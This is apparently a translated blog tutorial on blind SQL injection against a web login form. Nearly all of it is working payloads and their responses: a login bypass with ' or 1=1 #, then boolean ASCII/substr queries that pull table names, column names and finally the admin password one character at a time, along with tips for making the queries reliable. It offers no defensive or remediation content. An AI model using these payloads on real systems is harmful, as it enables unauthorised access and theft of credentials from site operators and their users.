[WEB] Blind SQL Injection attack method
- http://blog.naver.com/funny303/220778035079
- http://pypie.tistory.com/entry/Blind-SQL-Injection
- http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html
1. SQL Injection test
[SQL Injection Query] ' or 1=1 #
[Response] 1) Success // the login is bypassed, so the id field is injectable
           2) Login Failed // the input is filtered or not injectable
2. Blind Injection
2.1. Checking the number of databases
[[ Database check ]]
Each blind query has only two outcomes, and every later step reads them the same way:
- Response : Success // the injected condition is true
- Response : Login Failed // the injected condition is false
2.2. Extracting table names
[[ Extracting tables (information_schema.tables) ]]
:: Narrow the range by changing the number, based on the ASCII table
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 110 #
- Response : Login Failed
:: Confirm the first character
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 108 #
- Response : Success
:: Confirm it is exactly right (109 = 'm')
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) = 109 #
- Response : Success
:: Confirm the second character (the second character of "member" is 'e', ASCII 101)
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),2,1)) = 101 #
- Response : Success
:: Confirm the last character
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),7,1)) = 0 #
- Response : Success
Position 7 comes back as 0 because substr() past the end of the string returns '' and ascii('') is 0 in MySQL, so the name is six characters long: "member". Two practical notes: `or 1=1 and X` is parsed as `or (1=1 and X)`, which is why the login succeeds exactly when X is true; and without a schema filter the first row of information_schema.tables may belong to a system database, so add `and table_schema=database()` to the WHERE clause to stay inside the application's own database.
2.3. Extracting column names
[[ Extracting columns - information_schema.columns ]] --> uses the table name "member" found in 2.2
:: Narrow the range by changing the number, based on the ASCII table, then confirm each character exactly as in 2.2
' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 110 #
Changing `limit 0,1` to `limit 1,1`, `limit 2,1`, ... walks the remaining columns of the table one at a time.
2.4. Finding values
[[ Finding stored values ]] --> uses the "password" column and the "id" column found in 2.3
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) > 100)#
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),16,1)) =0)#
The second query returning Success means position 16 is past the end, so the admin password is 15 characters long; each of the 15 positions is then narrowed down with the same > N / = N comparisons as in 2.2.
That concludes this post.
thanks : silverbug (environment support)